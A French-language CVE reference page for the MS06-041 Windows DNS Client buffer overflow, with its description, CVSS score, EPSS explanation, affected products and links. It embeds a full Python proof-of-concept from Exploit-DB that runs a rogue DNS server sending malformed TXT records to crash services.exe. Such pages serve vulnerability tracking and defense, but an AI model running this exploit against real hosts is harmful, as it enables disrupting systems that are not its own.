Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
Buffer overflow in the DNS Client service in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a crafted record response. NOTE: while MS06-041 implies that there is a single issue, there are multiple vectors, and likely multiple vulnerabilities, related to (1) a heap-based buffer overflow in a DNS server response to the client, (2) a DNS server response with malformed ATMA records, and (3) a length miscalculation in TXT, HINFO, X25, and ISDN records.
Informations du CVE
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 10 | AV:N/AC:L/Au:N/C:C/I:C/A:C | nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 2900
Date de publication : 2006-12-08 23h00 +00:00
Auteur : Winny Thomas
EDB Vérifié : Yes
#!/usr/bin/python
#POC for MS06-041
#Run the python script passing the local ip address as parameter. The DNS server
#will start listening on this ip address for DNS hostname resolution queries.
#This script is for testing and educational purpose and so to test this one will
#have to point the DNS resolver on the target/client to the ip address on which
#this script runs.
#Open up internet explorer and type in a hostname. services.exe will crash.
#You may have to repeat this two or three times to see the crash in services.exe
# Tested on Windows 2000 server SP0 and SP1 inside VmWare. Could not
# reproduce on SP4 though it is also vulnerable. May be I missed something :)
#
# For testing/educational purpose. Author shall bear no responsibility for any screw ups
# Winny Thomas ;-)
import sys
import struct
import socket
class DNSserver:
def __init__(self, localhost):
self.response = ''
self.__create_socket(localhost)
def __create_socket(self, localhost):
self.host = localhost
self.port = 53
self.DNSsocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.DNSsocket.bind((self.host, self.port))
print 'Awaiting DNS queries'
print '====================\n'
while 1:
self.__await_query()
def __await_query(self):
self.Query, self.Addr = self.DNSsocket.recvfrom(1024)
print 'Query from: ' + str(self.Addr)
self.TransactID = self.Query[0:2]
self.__find_type(self.Query[2:])
def __find_type(self, Question):
qType = struct.unpack('>H', Question[0:2])
if qType[0] == 256:
self.__send_response(Question[10:-4])
def __send_response(self, sName):
self.response = self.TransactID
self.response += '\x85\x80' #Flags
self.response += '\x00\x01' #Questions
self.response += '\x00\x02' #Answer RR's
self.response += '\x00\x01' #Authority RR
self.response += '\x00\x00' #Additional RR
#QUERIES
#self.response += sName
self.response += '\x04\x74\x65\x73\x74\x07\x68\x61\x63\x6b\x65'
self.response += '\x72\x73\x03\x63\x6f\x6d\x00'
self.response += '\x00\xff' #request all records
self.response += '\x00\x01' #inet class
#ANSWERS
#A record
self.response += '\xc0\x0c\x00\x01\x00\x01\x00\x00\x00\x07'
self.response += '\x00\x04\xc0\xa8\x00\x02' #A type record (IP add)
#TXT record
self.response += '\xc0\x0c\x00\x10\x00\x01\x00\x00\x00\x07'
self.response += '\x00\x18' #TXT record length
self.response += '\x08\x50\x52\x4f\x54\x4f\x43\x4f\x4c'
self.response += '\x00' #Zero length TXT RDATA
self.response += '\x00' #Zero length TXT RDATA
self.response += '\x08\x50\x52\x4f\x54\x4f\x43\x4f\x4c'
self.response += '\x00' #Zero length TXT RDATA
self.response += '\x00' #Zero length TXT RDATA
self.response += '\x01\x41'
#Authoritative Nameservers
self.response += '\xc0\x11\x00\x02\x00\x01\x00\x01\x51\x80'
self.response += '\x00\x0b\x08\x73\x63\x6f\x72\x70\x69\x6f'
self.response += '\x6e\xc0\x11'
self.DNSsocket.sendto(self.response, (self.Addr))
if __name__ == '__main__':
try:
localhost = sys.argv[1]
except IndexError:
print 'Usage: %s <local ip for listening to DNS request>' % sys.argv[0]
sys.exit(-1)
D = DNSserver(localhost)
# milw0rm.com [2006-12-09]
Products Mentioned
Configuraton 0
Microsoft>>Windows_2000 >> Version *
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
Microsoft>>Windows_2003_server >> Version 64-bit
Microsoft>>Windows_2003_server >> Version sp1
Microsoft>>Windows_2003_server >> Version sp1
Microsoft>>Windows_xp >> Version *
Microsoft>>Windows_xp >> Version *
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version *
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
Références
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-041
Tags : vendor-advisory, x_refsource_MS
Tags : vendor-advisory, x_refsource_MS
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A723
Tags : vdb-entry, signature, x_refsource_OVAL
Tags : vdb-entry, signature, x_refsource_OVAL
